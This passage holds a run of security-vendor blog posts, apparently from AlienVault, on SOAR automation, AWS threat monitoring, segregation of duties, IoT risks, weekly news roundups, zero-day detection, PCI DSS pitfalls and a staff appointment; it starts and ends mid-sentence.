vulnerabilities on their targets and to automate their own attacks (with increasing success). They often share tools available on the Dark Web and hacker attacks are now faster, more calculating, and more lethal. The threat actors are many and varied including nation states, criminal enterprises, and hacktivists. The three factors I highlighted are not the only ones forcing the need for automation and orchestration tools, but they are prevailing ones. To keep up with cyber-threats and help level the playing field against attackers, companies and governments need to evaluate and assimilate many of the automation and orchestration tools that hackers employ and integrate them into their own Security Automation and Orchestration (SOAR) platforms and security information and event management (SIEM) platforms. They should implement these tools and technologies under a comprehensive risk management strategy. Security automation and orchestration of applications should be commensurate and grow with derived benefits (and adversarial risks) from AI and ML. These technologies can provide for more efficient decision-making by prioritizing and acting on data, especially across larger networks and supply chains with many users and variables. The automation and orchestration tool chest can now utilize horizon scanning technologies, filter through alerts, use predictive analytics, facilitate identity management, coordinate incident response (audits and alerts), use self-repairing software and patch management, and employ forensics and diagnostics after an attack. Automation and orchestration can be valuable in enhancing existing cybersecurity architecture such as preventive security controls, including firewalls, application security and intrusion prevention systems (IPSs). Perhaps most importantly, automation and orchestration can provide a more rapid response capability across a multitude of security components and tools whether they are located in the Cloud or in onsite data centers. The faster a CISO can identify and address a threat or breach, the better the likely outcome. Combating machine-driven hacker threats requires being proactive by constantly updating and testing cybersecurity capabilities. Using ML automation platforms to recognize and predict anomalies associated with the data-base of behavioral patterns of malicious threats can be an indispensable layer in an integrated cyber-defense. For the public sector, automation, combined with ML and AI, is an emerging and future cybersecurity pathway, especially for industrial systems and critical infrastructure. DARPA is investing for the Department of Defense (DoD) in developing these capabilities for the warfighter. DARPA announced a multi-year investment of more than $2 billion in new and existing programs called the “AI Next” campaign. DARPA’s website notes that “key areas of the campaign includes automating critical DoD business processes, such as security clearance vetting or accrediting software systems for operational deployment; improving the robustness and reliability of AI systems; enhancing the security and resiliency of ML and AI technologies; reducing power, data, and performance inefficiencies; and pioneering the next generation of AI algorithms and applications, such as “explainability” and “common sense reasoning.” For domestic federal security, the Department of Homeland Security (DHS) has deployed an automated cyber surveillance system that monitors federal internet traffic for malicious intrusions and provides near real-time identification and detection of malicious activity called EINSTEIN. This system is continually being upgraded. Einstein is only one element of DHS’s use of automation. DHS’s newly created Cybersecurity and Infrastructure Security Agency (CISA) will be using cognitive automation for cyber, collaboration and communication capabilities in many areas of its defined mission: Proactive Cyber Protection CISA's National Cybersecurity and Communications Integration Center (NCCIC) provides 24x7 cyber situational awareness, analysis, incident response and cyber defense capabilities to the Federal government; state, local, tribal and territorial governments; the private sector and international partners. CISA provides cybersecurity tools, incident response services and assessment capabilities to safeguard the ‘.gov’ networks that support the essential operations of partner departments and agencies. Infrastructure Resilience CISA coordinates security and resilience efforts using trusted partnerships across the private and public sectors, and delivers training, technical assistance, and assessments to federal stakeholders as well as to infrastructure owners and operators nationwide. CISA provides consolidated all-hazards risk analysis for U.S. critical infrastructure through the National Risk Management Center. Emergency Communications CISA enhances public safety interoperable communications at all levels of government, providing training, coordination, tools and guidance to help partners across the country develop their emergency communications capabilities. Working with stakeholders across the country, CISA conducts extensive, nationwide outreach to support and promote the ability of emergency response providers and relevant government officials to continue to communicate in the event of natural disasters, acts of terrorism, and other man-made disasters. Cybersecurity Ventures predicts that cybercrime will cost the world $6 trillion annually by 2021. That is a scary scenario. It is important that both government and industry are investing together in automation and orchestration to harness productivity and to especially address cyber-threats. It will take a vibrant partnership to help meet the threats. With every passing year, cyber criminals become more sophisticated and adept in their cyber-attacks. In view of a lack of skilled workers, expanding digital connectivity, and the growing sophistication of adversaries, automation and orchestration are key elements for a viable cybersecurity posture. Ultimately, incorporating these elements will become a cybersecurity imperative in an AI and ML guided world.
Viva Las Vegas! We aliens have landed at AWS re:Invent 2018 (Booth #1506), bringing phenomenal threat detection, response, and compliance to the AWS cloud. As I gear up for a full day of live product demos, I thought I’d take a moment to highlight some of the ways in which AlienVault is delivering phenomenal security to our customers’ AWS environments and beyond. We’re monitoring more AWS services than ever, giving you deeper security visibility of your AWS infrastructure. In 2018, we’ve expanded the number of AWS services that USM Anywhere monitors to include Amazon GuardDuty, Amazon Macie, AWS Application Load Balancer, Amazon Redshift, AWS Lambda invocations, AWS Web Application Firewall, and Amazon API Gateway. This is in addition to the other services we monitor and alert on, including AWS CloudTrail, Amazon S3 access logs, Amazon ELB access logs, Amazon VPC flow logs, AWS Config, Amazon CloudFront, and Amazon CloudWatch. Expanding our AWS threat coverage continues to be a priority for us as more and more customers undergo digital transformations and begin to leverage cloud services and applications to run their businesses. USM Anywhere continuously and automatically monitors AWS infrastructure for threats and anomalous behaviors, assesses your AWS environment for vulnerabilities and configuration errors, and simplifies logging and reporting—all from one cloud-hosted platform. What’s more, USM Anywhere centralizes security monitoring across AWS, multi-cloud, hybrid, and on-premises networks, including SaaS applications like Office 365 and G Suite, ensuring continuous coverage even as you migrate workloads and data from the network to the cloud and helping to eliminate security blind spots. This single-pane-of-glass approach alleviates the need to invest in multiple, siloed security monitoring tools for clouds, networks, and data centers, as John Chesser, Director of Cybersecurity Solutions at DataPath, a certified AlienVault MSSP, pointed out. “There's time, money, resources that are impacted by having to use the multitude of products out there. With USM Anywhere, I've got it all." We’re keeping your defenses current with continuous AWS-specific threat intelligence. As part of the continuous threat intelligence subscription built into USM Anywhere, the AlienVault Labs Security Research team maintains an AWS-specific correlation rule set. Threat actors are increasingly targeting insecure cloud accounts to access exposed data or set up cryptojacking operations. Once an attacker has gained access to your AWS account, their actions and behaviors may be unique or specific to the environment, such as programmatically spinning up new services. It’s not enough to rely on traditional threat intelligence, which focuses on network threats rather than cloud-specific attacks. That’s why the AlienVault Labs Security Research Team curates AWS-specific threat intelligence, researching and analyzing millions of security events every day using a combination of machine learning, human analysis, and the community-sourced threat data of the AlienVault Open Threat Exchange (OTX) and its 100,000+ global participants. Here are a few examples of AWS-specific correlation rules added in 2018: The password associated with an administrator of a Windows instance was retrieved through the AWS console, which may indicate compromised credentials An EC2 instance in your AWS environment is querying a domain name associated with a known command and control server The machine is behaving in a way that deviates from the established baseline; it has no history of sending this much traffic, suggesting it might be compromised A request for temporary security credentials has been followed by the removal of multiple API Keys, a technique malicious actors use to maintain persistence and prevent the owner of the AWS account from regaining access A new AWS user account is deleting multiple user accounts in a short period of time, which could be malicious attackers trying to disrupt incident response efforts The automatic and continuous threat intelligence updates from the AlienVault Labs Security Research Team enables USM Anywhere customers to keep up with the latest cloud security threats with minimal effort. As John Chesser noted, “Ultimately, with that integration of the threat intelligence, I haven't had to take information from a third party and try to integrate that. I'm not having to jump to some other product to do it. It's all there together.” We’re adding another layer of AWS threat detection with the AlienVault Agent. Earlier this year, AlienVault announced the addition of the AlienVault Agent, a lightweight endpoint agent based on osquery that enables endpoint detection and response (EDR) capabilities in USM Anywhere. When deployed to endpoints within an AWS environment, the AlienVault Agent provides host-based intrusion detection and file integrity monitoring capabilities that are not possible through CloudTrail. Whereas CloudTrail provides visibility into activity that occurs at the management level, such as when someone creates a file in an S3 Bucket or spins up a new service, the Agent can reveal system-level information such as which users are logging in, which files are being created, and which modifications and configurations are being modified. This helps USM Anywhere detect activity like persistence by malware and attackers. In combination, CloudTrail monitoring and the AlienVault Agent provide a multi-layered approach to threat detection in USM Anywhere. For example, let’s look at how USM Anywhere helps users detect cryptojacking. Often, an attacker will use compromised AWS credentials to gain access to an AWS environment and begin to consume your resources for cryptomining activities. USM Anywhere detects this activity through CloudTrail event logs. However, another common cryptomining attack method comes with a sneaky twist that’s much more difficult to detect. Instead of spinning up new resources that can be detected through CloudTrail monitoring, an attacker might compromise existing instances within an AWS environment, perhaps through a web vulnerability or SSH. While CloudTrail can’t provide visibility of what’s happening on the system itself, the AlienVault Agent can still detect these exploits with its endpoint visibility. We work hard to provide powerful cloud security for AWS environments, and our customers reap the benefits. For Jason Harper, CEO and Founder of CeloPay, a payment processing technology company whose offering is built entirely in AWS, using USM Anywhere has been a game-changer. “I am thrilled with USM Anywhere,” Harper said. “The platform’s centralized log management consolidates and parses CeloPay’s millions of data points to provide full security visibility, which has reduced our PCI DSS compliance reporting time from eight weeks or more to one week.” Overall, it’s been a great year for AWS security with USM Anywhere, and I’m proud to share the work we’ve done to help keep your AWS environments secure. Join us at AWS re:Invent #1506 this week to learn more about how AlienVault secures customers' AWS environments. Read more: Learn more about Celopay’s experience with USM Anywhere in this case study Watch the AWS security webinar featuring CeloPay Learn about PCI DSS Compliance on AWS with USM Anywhere Read the Whitepaper: Best Practices for AWS Security Check out our AWS Security solution brief
Segregation of duties is a fundamental information security practice. In simple terms, it means you split out important tasks between two or more people. This prevents one person getting drunk on all the power they wield, and also prevents one person from making a mistake that can have undesired consequences. One of the best examples of segregation of duties can be seen in movies when it comes to launching nuclear missiles. The system relies on two people on opposite sides of the console to put in and turn their keys at the same time. This segregation or separation of duties ensures that one person can’t launch a nuclear missile on their own. Segregation of duties works best when there is a clearly defined function and where there is some physical separation. For example, in a call centre or a banking app, a low junior administrator may be able to authorise payments up to $500, but anything above that would need supervisors’ approval. The junior admin can enter in the details, and send it off to the supervisor who can then approve or decline it. But in many cases, the broader application can sometimes have some flaws. In one of my first jobs in IT Security, our team had implemented a process for separating duties whenever a new HSM key (key change ceremony) needed to be loaded. I worked in the team that would have half the password to complete this task, and another team would hold the other half. Much like the end of the film Bulletproof Monk; I even had my half of the password tattooed on my back – I still don’t know what it says to this day. Once a project was underway, it meant I’d have to travel across the country to the data centre with my half of the password in order to change the key with the help of a colleague. The only problem with that is - have you ever worked on a project? It’s never on time - always delayed. And datacenters are COLD! So here I was sat in a datacenter with this other guy who was about 50, but was clearly experienced in these projects as he was sitting under a blanket he’d brought, reading his book and munching on some snacks. What’s wrong with this scenario? Other than the fact I didn’t have a blanket or snacks - that we’ve travelled from different parts of the country, with half of a password, only to be sat together for hours. Invalidating all the expensive measures taken to segregate the two halves of the password. Even worse, I had no idea what I was doing or how to do it. I was told the documentation was up to date and easy to follow - but documentation being up to date is one of the biggest lies our team told. So, I ended up having to ask my colleague to help me out - which inevitably meant I gave him my half of the password and asked him to enter it… yeah, separation of duties kind of fell apart right there. Having said that, those were simpler times, there was no bring your own device, and there certainly wasn’t anything hosted in the cloud. Many times when organisations adopt cloud apps, they overlook segregating duties, or defining job functions for role-based access control (RBAC). So, it ends up with an all-or-nothing approach. Which works fine if all employees are trustworthy, and never make a mistake. Unfortunately, it’s all too easy to make a mistake. When a single contractor is able to inadvertently leak the personal details of all employees in the database, one has to consider whether one person should have the power to do that, or if the access should be segregated. Similarly, if a rogue trader can make investments and harm a bank, one needs to question why the systems were setup in a manner to allow them to carry out such trades with little oversight. Or allowing developers to accidentally push code to production environments with one click… Recently a French cinema chain were tricked by an email in a business email compromise (BEC) scam which resulted in the CFO making payments of $21M to the fraudsters. The question shouldn’t be why the CFO allowed themselves to be tricked, but why did the systems allow the CFO to make such large payments without any checks and balances in place? While a host of technologies can help in these situations, a bit of forethought with proper separation and accountability can go a long way. Did these people learn nothing from Bulletproof Monk? Seriously, you should watch that movie – it’s got a lot going on.
The internet of things (IoT) is changing nearly every industry. Smart devices that can collect and process data, and even make decisions based on that data, though artificial intelligence promises to disrupt business as we know it for years to come. However, there are some legitimate concerns. The more connected devices your company has, the more potential vulnerabilities are out there. As business owners we want to be able to access the data we collect through the IoT, but we also need to be able to protect that data, and we bear the responsibility for keeping that data secure. This, like many areas of business, is a time for brutal honesty. If you have vulnerabilities, you need to fix them. You don’t want to be part of the headlines about companies who acted too late or not at all. Your security must adapt to the IoT, and it needs to do so now. Is the internet of things threatening your company’s security? There are a few questions you will need to ask yourself and your IT department to truly determine the answer: How do I know? Most experts agree that the weakness in any network is the devices that make up the IoT. For example, if you have smart light bulbs in your home, they are likely controlled by a hub which not only provides you with more flexibility in controlling them, but also provides security so they do not become a weak point in your network. This is why an intrusion detection system (IDS) is so important. Technologies from companies like AlienVault allow you to monitor for threats and even give you advice on how to prevent harm from them. Remember there is more than one area of vulnerability in any system. Cloud-based IDS, network IDS, and host-based IDS, along with file integrity management systems, are all essential parts of your strategy. These alerts tell you there is an attack and can even reveal threats to you, which allows you to put remediation and prevention strategies in place. But what are the threats you should be aware of? What are the threats? Why don’t we have houses that are completely smart and controlled by IoT devices? What about our cars? Part of the reason is that a hacker with the right tools could potentially take over control of a house or even a connected car from the owner or driver. For example, the Bangladesh National Bank lost $81 million due to an IoT-based attack. What are these types of attacks? There are actually several, and they mirror other types of cyberattacks. Distributed Denial of Service (DDoS): Chrysler/Jeep was vulnerable to this type of attack. Essentially, control of devices or a system is taken by a hacker. Sometimes this comes with ransomware, where the owner or user has to pay to get that control back. Malware: IoT devices can be used by an attacker to spread malware, sometimes to more than one device. Botnets: A botnet is a network of computers that are infected and used to perform malicious attacks like the fridge that was sending SPAM emails. We hear about these types of attacks in the news on a regular basis, and unfortunately as security evolves and gets better, hackers innovate as well, finding new ways to get past security measures. They are always searching for vulnerabilities, so you and your business must be just as vigilant as they are. What preventative actions can I take? The risks are clearly out there. Just knowing there is an attack and the types of attacks is not enough, however. You also need to know how to prevent them. This is a multipronged answer, but there are some simple, general steps any business can implement to prevent all but the most determined of attacks or at least slow them down. Buy the Right Devices Whether they are for your home or your business, purchasing the right devices in the first place, ones with good security ratings, is probably the most important step. Do they plug into a controller or have a controller of their own? What level of security does it and the device itself have? This means doing some research beyond the hype on the product or company website. Look at other online review sites, scroll through forums and groups about security, and simply just ask IT security professionals who you know or who work for you. Change Passwords from Defaults and Use Strong Ones This may be something that seems obvious, but the number of times that an IT professional can walk into a business or someone’s home and open a device or network with a default password is amazing. Even more frequently, passwords are simple to guess or are just extremely weak. This is perhaps the most frequently vulnerable area of any system, yet it is easily prevented. You can use a password-generator program like LastPass or even iCloud keychain if you are a Mac user, and the program will remember your passwords for you. There’s no reason not to have strong passwords and change them often. Hire the Right People This may be the most important point of all. Encryption, comprehensive security solutions and all of the above actions depend on people, both those who know how to implement them and the employees who use them. Hire the right IT people. A degree matters in many fields, and IT is one of them. Hire someone with a degree in information systems and security, and if they have been in the workforce for a while, look at continuing education and how up-to-date they are on the latest techniques and technology. Educate your employees: There should be regular classes company-wide on what the latest IoT devices are, how they are vulnerable, and how employees play a role in protecting themselves and the company. Address issues right away. If you have a personnel issue or find that someone is out of compliance with your policies, take corrective action immediately. Your security is only as strong as its weakest link, and often that is the person in front of the computer. Anyone who has access to your network is a key player in IoT security. They can bypass many of your safety measures unintentionally. HR plays a big role in this process from the hiring to the training of employees, vendors, and contractors. The IoT is a wonderful tool in the right hands and a dangerous weapon in the hands of others. Make sure that your company security is not threatened by being vigilant, knowing the threats that are out there, taking preventative action, and hiring the right people to help.
Collecting stories over the course of the week is always fun. You start reading one story, and before you know it you’re down the rabbit hole of technology, security, and privacy reading up papers on how scientists want to embed IoT devices in giraffes necks. Fear not, I am here to strip away the mundane and irrelevant and bring you only the best in news, designed to make your heart flutter. Why Google consuming DeepMind Health is scaring privacy experts Google’s decision to bring DeepMind Health, the medical unit of the AI-powered company it acquired four years ago, closer to the mothership may leave 1.6 million NHS patients with “zero control” over where their personal data goes, experts say – while an independent body set up to oversee the protection of such data has been broken up. While there’s not denying that there are huge benefits to be gained from better aggregation and analysis, but by whom, with what oversight, and where does it end? Why Google consuming DeepMind Health is scaring privacy experts | Wired In related Google news, the company has published its first quarterly transparency report with stats on the security of the Android ecosystem. Android ecosystem security | Google On a side note, maybe we give big data analytics too much credit sometimes. User Behavior Analytics Could Find a Home in the OT World of the IIoT UBA has been around in data-centric IT for at least four years, but it has never become industry-standard primarily because in the real world, user behavior in IT is so varied and complex that UBA often creates more false alarms than useful ones. In IT, UBA has often failed to find the dangerous needle in the immense haystack of user behavior. But user behavior in process-centric OT is much simpler: OT systems run the plant, and scripted user activity is nowhere near as varied as in IT, with its multiple endpoints and inputs, email browsing, multipart software stacks, etc. User Behavior Analytics Could Find a Home in the OT World of the IIoT | Dark Reading IT-to-OT Solutions That Can Bolster Security in the IIoT | Dark reading Busting SIM Swappers and SIM Swap Myths SIM swapping attacks primarily target individuals who are visibly active in the cryptocurrency space. This includes people who run or work at cryptocurrency-focused companies; those who participate as speakers at public conferences centered around Blockchain and cryptocurrency technologies; and those who like to talk openly on social media about their crypto investments. REACT Lieutenant John Rose said in addition to or in lieu of stealing cryptocurrency, some SIM swappers will relieve victims of highly prized social media account names (also known as “OG accounts“) — usually short usernames that can convey an aura of prestige or the illusion of an early adopter on a given social network. OG accounts typically can be resold for thousands of dollars. Busting SIM Swappers and SIM Swap Myths | Krebs on Security The deep, dark reach of the magecart group For at least four years, a distributed, sophisticated network of cybercrime groups known collectively as Magecart has been compromising ecommerce sites small and large, as well as payment processors,installing web skimmers to steal confidential information, and raking in a fortune by selling pilfered card numbers on the underground, largely without any repercussions. Although security researchers have been tracking some of the groups since 2015, only recently has the Magecart name begun to ring out, as some elements of the group have hit major targets, including Ticketmaster and Newegg, drawing the attention of several law enforcement agencies and heightened interest in the research community. The deep, dark reach of the magecart group | Decipher Fake news 'to get worse' by 2020 election Krikorian, a computer scientist who previously held senior positions at Uber and Twitter, acknowledged social media companies like Facebook are taking steps to increase transparency. But he said their business models, driven by revenue and engagement, do not incentivize solutions for fighting fake news, and the problem wouldn't fix itself by the next U.S. presidential election. Fake news 'to get worse' by 2020 election unless social media firms act, DNC tech chief says | CNBC DOD prepares endpoint cybersecurity strategy as mobility booms In the end, will it come back to the endpoint? As the use of mobile devices and services pervades the lives of civilians and military personnel alike, the Department of Defense is taking a more endpoint-driven approach to how it secures its networks, developing a forthcoming enterprise cybersecurity strategy focused specifically around the gadgets people use. DOD CIO Dana Deasy said, “One of the things I keep stressing is we have to step up and face the reality about the world around us becoming more and more mobile, each and every day.” And it’s getting to a point where DOD must begin to embrace mobility, even if it means added security challenges. DOD prepares endpoint cybersecurity strategy as mobility booms | Fedscoop The rise of multivector DDoS attacks A really good post on DDoS trends, and the rise of multivector DDoS attacks, which shouldn’t come as a complete surprise to most; but seeing this analysis helps quantify it all The rise of multivector DDoS attacks | Cloudflare Six month prison sentence for motor industry employee in first ICO Computer Misuse Act prosecution So, the ICO does have some teeth after all. A motor industry employee has been sentenced to six months in prison in the first prosecution to be brought by the Information Commissioner’s Office (ICO) under legislation which carries a potential prison sentence. Mustafa Kasim, who worked for accident repair firm Nationwide Accident Repair Services (NARS), accessed thousands of customer records containing personal data without permission, using his colleagues’ log-in details to access a software system that estimates the cost of vehicle repairs, known as Audatex. He continued to do this after he started a new job at a different car repair organisation which used the same software system. The records contained customers’ names, phone numbers, vehicle and accident information. Six month prison sentence for motor industry employee in first ICO Computer Misuse Act prosecution | ICO Clickjacking on Google MyAccount Worth 7,500$ A nice writeup by a researcher who found a clickjacking bug on Google. My favourite was the timeline at the end: Aug 11 : Report to Google Aug 15 : Google Staff Ask Detail Aug 15 : Adding Detail Aug 21 : Google Can’t Prove Bug Aug 21 : Give them Video to PoC Aug 28 : Google Ask About Attack Scenario Aug 28 : Give the Attack Scenario Sep 11 : Nice Catch! Sep 25 : Bounty 7,500$ Sep 25 : I Cry. Clickjacking on Google MyAccount Worth 7,500$ | Apapedulimu Other things I liked this week Why I Dislike Applying “Game-ification” To Goal-Oriented | Paul Jorgensen The future of data storage isn’t on the cloud - it’s on the ‘edge’ | Independent Mysterious Re-Routing of Google Traffic Could Have Been an Attack, or Just a Glitch | Gizmondo System error: Japan cybersecurity minister admits he has never used a computer | Guardian
Introduction Recently, an AlienVault customer reached out to ask how AlienVault handles the detection of zero-day attacks, which are exploits against previously unknown vulnerabilities. In this blog, I shed light on how we approach this. Modern security products rely on some definition of threats, whether that definition is as specific as a signature that identifies a unique strain of malware or as general as a behavior pattern that threat actors employ broadly across different strains of malware. The challenge of security is keeping those definitions up to date as attacks emerge and evolve in the wild every single day. Most organizations outside of the Fortune 500 do not have the resources to tackle this challenge on their own. There are a few approaches to this challenge of staying ahead of the always-shifting threat landscape and new zero-day attacks. One is to discover vulnerabilities before threat actors discover them and figure out how to exploit them. Another is to identify the active exploit in the wild early and to quickly update your defenses immediately to detect and respond to it. AlienVault uses both of these approaches to keep our customer environments secure in the face of zero-day attacks. Let’s take a deeper look at how. Early Access to New Vulnerability Information One way to stay ahead of emerging threats is to know about the vulnerability before threat actors have an opportunity to exploit it. As soon as a new software vulnerability or security flaw becomes public knowledge, threat actors go to work, taking advantage of the time it takes for security vendors to update their tools and for security teams to then identify and patch their vulnerabilities. That’s why it’s a security best practice for software researchers to inform security vendors of new threats and vulnerabilities before they announce them to the general public. For example, AlienVault participates in Microsoft’s Microsoft Active Protections Program (MAPP). Through this program, AlienVault Labs receives early access to new vulnerability information for Microsoft and Adobe products before Microsoft publishes it in its monthly security update. This allows us to update the defenses in USM Anywhere ahead of a public announcement, giving our customers a headstart in identifying and remediating the vulnerabilities in their environments. Discovering Zero-Day Attacks as they Emerge in the Wild Of course, the “good guys” are not always the first to discover new vulnerabilities. All too often, threat actors find and exploit vulnerabilities before vendors have the opportunity to discover and release patches for them. Thus, zero-day vulnerabilities are often discovered after they’ve been exploited in a successful zero-day attack. That’s why it’s important to have a constant watchful eye on the global threat landscape as well as the ability to operationalize new threat information as soon as it becomes available. The Power of the Global Threat Intelligence Community AlienVault has a couple of strategies here. First, AlienVault USM Anywhere is unique in its ability to detect zero-day attacks thanks to its direct integration with the Open Threat Exchange (OTX), the world’s largest open threat intelligence sharing community. The global OTX community of over 100,000 security researchers and practitioners contribute 19 million pieces of threat data daily, and they often alert the community within the initial minutes or hours of discovering an attack in the wild. This threat data is available to any OTX user to consume in their security tools. For AlienVault USM Anywhere users, OTX threat data is integrated and ready to use in the platform. Users can subscribe to any OTX Pulse to enable security alerting on the indicators of compromise (IOCs) published within that pulse. Users can also subscribe to email notifications to stay aware of specific attacks, threat actors, or malware families as they evolve. AlienVault Labs Security Research Team In addition to the community-powered threat data shared in OTX, USM Anywhere receives continuous and automatic threat intelligence from the AlienVault Labs Security Research Team. This team works on behalf of all USM Anywhere customers, monitoring the global threat landscape daily, analyzing threats with a combination of human and machine intelligence, and curating the threat intelligence that is delivered continuously and automatically to USM Anywhere. AlienVault Threat Intelligence is ready to use and is written to proactively detect higher-level activities, patterns, and behaviors to effectively automate threat hunting activities across customer environments. Behavioral-Based Detection Detecting threats based on IOCs like file hashes and IP addresses enables security teams to identify emerging attacks quickly and with higher confidence. Yet, alone, IOCs are fairly volatile as threat actors can alter them very quickly, easily, and even automatically. Less volatile are the tactics, techniques, and procedures (TTPs) that threat actors use (and reuse) to carry out attacks. Think of these as the recipe for the attack - it’s the high level tasks they perform at each stage of attack. These steps are often the same for different malware or campaigns, so identifying them is more effective than focusing on other methods of detection. For example, consider a network attack. The initial network intrusion may be done using a brand new, unidentified vulnerability. But, once the threat actor gains access to the system she attacked, her recipe calls for downloading tools needed to move laterally in the network and extract data. These tools can be identified when they are downloaded or when they communicate on the network. These tools are independent of the initial zero-day vulnerability that was exploited in order to gain access, so we can still detect the threat by detecting other tools used in the attack. To do this, AlienVault Labs uses machine learning algorithms to extract threat characteristics and clusters to identify known and unknown threats. These "clusters" are based on observed network behavior, OS interactions, and more. The algorithms further analyze these clusters to identify anomalous behavior. The AlienVault Labs team uses this information to codify the tactics, techniques, and procedures, which are packaged as correlation rules and delivered continuously to USM Anywhere as part of the threat intelligence subscription. Using this strategy, AlienVault was able to detect and block "ALPC zero day" months before it was actually identified in the wild and an IOC was written for it. This exploit is designed to take advantage of an API vulnerability in the Windows task “SchRpcSetSecurity” that controls the ALPC (Advanced Local Procedure call) interface allowing local users to obtain SYSTEM privileges. AlienVault Labs detected this privilege escalation technique with generic detection mechanisms that are resilient to a changing attack vector. In other words, they came up with a way to detect this type of privilege escalation that is independent of the exploit it is wrapped in. So any attack, even a zero day, that uses this technique is effectively identified by AlienVault. Another example is the well-known Apache Struts vulnerability. When it was first released, there was no defense against the attack. However, once it got onto a system, it leveraged a Webshell to communicate back to its masters. AlienVault USM Anywhere was already able to detect this Webshell because it was used by other attackers in previous campaigns as part of their TTPs. Summary In this blog post, I’ve outlined a few of the techniques that AlienVault leverages to detect emerging and evolving threats, including zero-day attacks. To quickly summarize: Early access to new vulnerability information allows us to update the vulnerability signatures in USM Anywhere ahead of public release. OTX acts as an early warning system of experts around the world, and they are bolstered by our internal threat team to quickly find and analyze new attacks. Advanced detection techniques like identification of behaviors and TTPs means AlienVault can detect many zero-day attacks even if the IOCs change frequently. See the table below for some examples of how these efforts have resulted in early detection of several different recent threats by USM Anywhere. Vulnerabilities and Zero-day Attack Examples that USM Anywhere Defends Against
Despite the fact that PCI DSS has been in effect for over a decade, and most merchants are achieving compliance, some of the world’s largest retailers have been hit by to data breaches. The sad truth is that achieving compliance doesn’t guarantee data protection, even for large organizations. For example, more than five million credit card numbers were stolen in 2018 hacks of two major retailers. Earlier this year, I hosted a webcast with Jacques Lucas from Terra Verde (one of our partners) covering challenges and best practices for achieving and maintaining compliance with PCI DSS. In his role as a QSA, Jacques has "seen it all" in terms of what commonly causes stumbling blocks for organizations on their compliance journey, which he summarized in a slide covering the Top 10 Pitfalls for PCI DSS Compliance. As a follow-on from the webcast, I wanted to dive into that area further to provide tips and best practices to help companies address those Top 10 Pitfalls for PCI-DSS. 1. Improper scoping The PCI DSS standard defines the scope of the cardholder data environment (CDE) as all of the systems, people, processes, and technologies that handle cardholder data. A common misconception is to overlook the systems that support and secure the CDE, and fail to include them in scope. Specifically, any systems involved in managing the security of in-scope systems are also considered in-scope, and need to be secured and monitored. Some examples include: IAM servers; Domain controllers; Key Management servers, Firewalls/IDS/IPS systems; Log management/SIEM systems; AV Management servers and more. Pro-tip: Segmentation and monitoring are the two critical success factors in avoiding the pitfalls associated with improper scoping. Isolate in-scope assets from the rest of your environment with granular network segmentation and access control policies. Additionally, monitor all access activity to validate compliance and respond to emerging risks. 2. Failing to patch systems regularly PCI DSS requirement 6 outlines the need to patch systems on a regular basis. Additionally, it specifies that critical security patches must be installed within a month of their release. The challenge is that patching processes can be very disruptive, and even well-established companies can easily fall behind. For example, in one high profile breach it took the company more than four months to identify an unpatched vulnerability that provided a foothold for their devastating data breach. Pro-tip: Identifying unpatched assets and applications is a must. Be sure you schedule regular vulnerability assessment scans and prioritize patching and remediation procedures for your in-scope systems. Monitor your in- scope systems with a combination of security controls including host-based and network-based IDS, file integrity monitoring, and SIEM event correlation. 3. Failing to audit access to cardholder data PCI DSS requirement 8 outlines how to secure access to cardholder data, specifically requiring two-factor authentication for remote access to all in-scope systems. While many organizations have implemented two-factor authentication, they often fail to audit this access to verify that these controls are working as expected. In fact, SecurityMetrics reports that insecure remote access was the largest single origin of compromise being used in more than 39% of investigated breaches against merchants. Pro-tip: Implement two-factor authentication on all of your CDE assets. Schedule periodic audits against these assets, to verify that controls are working properly. Additionally, enable monitoring on all CDE assets to capture a baseline. Finally, configure your SIEM to trigger alarms for all activity that falls outside this baseline so you can respond quickly to potential threats.
Today, we are happy to share that Graham Pearson has been appointed Vice President of Asia Pacific (APAC) for AlienVault, an AT&T company. In this role, Graham will lead our operations and sales strategy in the region. He is excited about joining AlienVault and providing APAC companies with the unified security management approach they need in moving to the cloud and keeping up with today’s evolving threats. “Joining AlienVault is a huge opportunity for me; it’s the right time and they have the right product at the right price for enabling fast, effective threat detection and response.” With more than 30 years of sales experience in the IT industry, 22 of those in cybersecurity, Graham has worked with Fortune 500 companies and fast growing start-ups. Most recently, he was Vice President for Okta, an identity management company, in APAC. In four years, he grew Okta’s Australian office from one employee to 50, supporting 400+ customers in the sales territory. Graham’s experience includes sales leadership roles for Oracle’s Security and Identity Management solution and Security Business Unit within the Fusion Middleware space. He also held various sales positions at CA Technologies and Websense for security products. When Graham is not working, he enjoys spending time with his wife and two kids, ages 17 and 13. Here’s more about Graham’s journey to AlienVault! Here’s a picture of Graham with his wife, Leila, while vacationing in Las Vegas.
Another week, another trove of articles I read so that I could bring you only the best. Because that’s just the kind of person I am. You’re welcome. A SOCless detection team I can’t remember if I shared this article a few months back, and I’m too lazy to go take a look - but it’s worth revisiting. We don’t talk about threat detection and response without mentioning a SOC in the same breath. But a SOC is just one mechanism to facilitate the desired outcome. What if we could achieve the same result, but without a SOC? A SOCless detection team at Netflix | Linkedin Related Threat Detection Is A Multi-Stage Process | Gartner blogs Hey there! How much are you worth? Have you ever stopped to think just how much your life is worth? I mean really think about it. For instance, let’s say you wanted to sell everything you have – your house, your car, your job, your private life, photos and home movies from your childhood, your accounts on various social media, your medical history and so on – how much would you ask for it all? Hey there! How much are you worth? | Securelist US Cyber Command starts uploading foreign APT malware to VirusTotal I think this is a good move, the more sharing, the better for defensive security right? Of course there are always caveats and scenarios where one would not share, but broadly speaking I hope more companies and government departments jump on board. The Cyber National Mission Force (CNMF), a subordinate unit of US Cyber Command (USCYBERCOM), set in motion a new initiative through which the DOD would share malware samples it discovered on its networks with the broader cybersecurity community.The CNMF kicked off this new project by creating an account on VirusTotal, an online file scanning service that also doubles as an online malware repository, and by uploading two malware samples. US Cyber Command starts uploading foreign APT malware to VirusTotal | ZDNet You're Going To Get Breached -- So How Should You Respond? We live in an age in which the rate of technological advancement is unparalleled. But of course, with new technologies come new security vulnerabilities. The best example being the imminent arrival of 5G and the rise of connected devices, which alone already present numerous vulnerabilities. According to Ponemon Institute's 2017 State of Cybersecurity in Small & Medium-Sized Businesses (SMB) report, 52% of organizations are not confident their current anti-virus software will protect them from ransomware. Even with the rise of artificial intelligence in cybersecurity and enhanced defensive software capabilities, hackers have shown themselves to be consistently one step ahead. With this in mind, businesses need to stop asking, “Will I be hacked?” and instead tackle the inevitable question, “When will I be hacked?” You're Going To Get Breached -- So How Should You Respond? | Forbes Destroy Logs, Hide Attacks Apparently hacker groups are increasingly turning to log file destruction and other destructive methods as a means to hide their tracks. Nothing really new here. I remember once messing up a change as a young secops admin, and erased the logs to cover up my mistake. But that’s a story for another 